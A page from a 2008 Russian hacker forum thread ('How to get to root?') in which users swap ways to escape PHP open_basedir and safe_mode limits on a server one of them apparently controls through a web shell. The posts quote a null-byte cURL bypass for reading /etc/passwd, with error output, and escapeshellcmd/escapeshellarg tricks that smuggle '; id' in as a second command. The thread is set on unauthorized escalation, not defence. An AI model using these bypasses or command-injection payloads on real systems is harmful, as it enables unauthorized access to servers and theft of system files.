ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Как пробиться к корню?
   
Ответ
Страница 4 из 4 < 1 2 3 4
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 04.10.2008, 19:58
Аватар для 1west
1west
Познающий
Регистрация: 08.02.2007
Сообщений: 30
Провел на форуме:
140272

Репутация: 3
По умолчанию
Цитата:
Сообщение от [Raz0r]  
доступ к /tmp делают для того, чтобы php мог записывать сессии. Кстати доступ открыт не только для /tmp и папки веб, но и usr/lib/php (для доступа к PEAR и другим общим скриптам)

версия php какая? возможно для твоей версии есть способ обхода ограничений
google.com/?q=open_basedir+bypass

в /usr/lib/php я зайти не могу.
пишет незя а в ошибке показывает что можно.
PHP Version 5.2.5-pl1-gentoo
Apache 2.0 Handler
 
Ответить с цитированием

  #32  
Старый 04.10.2008, 20:02
Аватар для 1west
1west
Познающий
Регистрация: 08.02.2007
Сообщений: 30
Провел на форуме:
140272

Репутация: 3
По умолчанию
Цитата:
Сообщение от $n@ke  
/etc/passwd
и т.п можешь попробовать прочесть с шелла "* ernealizm *" через file id.

правь сорцы для своих нужд.
где ево взять.
есть сылка?
 
Ответить с цитированием

  #33  
Старый 05.10.2008, 00:59
Аватар для 1west
1west
Познающий
Регистрация: 08.02.2007
Сообщений: 30
Провел на форуме:
140272

Репутация: 3
По умолчанию
вот нашел
http://groups.google.pl/group/mailing.unix.bugtraq/browse_thread/thread/fad2925061ad312d
PHP 5.2.5 cURL safe_mode bypass
The first issue [SAFE_MODE bypass]
var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
the last step in curl_init() function will only copy file://safe_mode_bypass to urlcopy.
The main problem exists in php_url_parse_ex() function. If you put in curl_init() "file://host/somewhere/path.php", php_url_parse_ex() will select /somewhere/path.php to path varible. Looks good but it cannot be used, when you will check real path. Using file:///etc/passwd is correct but between file:// and /etc/passwd, php_url_parse_ex() will select host and return path to /passwd.

как норм запрос составить
делаю var_dump(curl_exec(curl_init("file://etc/passwd")));
белая страница с надписью bool(false)
как я понел файл должен скопироваться?
 
Ответить с цитированием

  #34  
Старый 05.10.2008, 01:04
Аватар для mister
mister
Познающий
Регистрация: 24.07.2007
Сообщений: 31
Провел на форуме:
1417840

Репутация: 35
Отправить сообщение для mister с помощью ICQ
По умолчанию
var_dump(curl_exec(curl_init("file://etc/passwd\x00".__FILE__)));
 
Ответить с цитированием

  #35  
Старый 05.10.2008, 01:12
Аватар для 1west
1west
Познающий
Регистрация: 08.02.2007
Сообщений: 30
Провел на форуме:
140272

Репутация: 3
По умолчанию
если так
var_dump(curl_exec(curl_init("file:///etc/passwd")));
ответ
Warning: curl_init() [function.curl-init]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/ru:/usr/lib/php:/tmp) in /var/www/ru/1.php on line 2
Warning: curl_exec(): supplied argument is not a valid cURL handle resource in /var/www/ru/1.php on line 2
bool(false)
 
Ответить с цитированием

  #36  
Старый 05.10.2008, 01:18
Аватар для 1west
1west
Познающий
Регистрация: 08.02.2007
Сообщений: 30
Провел на форуме:
140272

Репутация: 3
По умолчанию
Цитата:
Сообщение от mister  
var_dump(curl_exec(curl_init("file://etc/passwd\x00".__FILE__)));
все что выводит
bool(false)
может заплатка какая стоит?
 
Ответить с цитированием

  #37  
Старый 05.10.2008, 13:45
Аватар для 1west
1west
Познающий
Регистрация: 08.02.2007
Сообщений: 30
Провел на форуме:
140272

Репутация: 3
По умолчанию
вот по свежее выполнение команд
http://securityvulns.ru/Tdocument809.html
[1] escapeshellcmd()
escapeshellcmd("echo ".chr(0xc0).";id");

[2] escapeshellarg()
$arg1 = chr(0xc0);
$arg2 = "; id ; #";
$cmd = "echo ".escapeshellarg($arg1)." ".escapeshellarg($arg2);

после этого белая страница.
вывода команды нету.
ошибок тоже.
 
Ответить с цитированием
Ответ
Страница 4 из 4 < 1 2 3 4



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как стать Хакером? (или как всё начиналось у вас?) RaZ_69 Болталка 46 22.02.2006 08:33



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ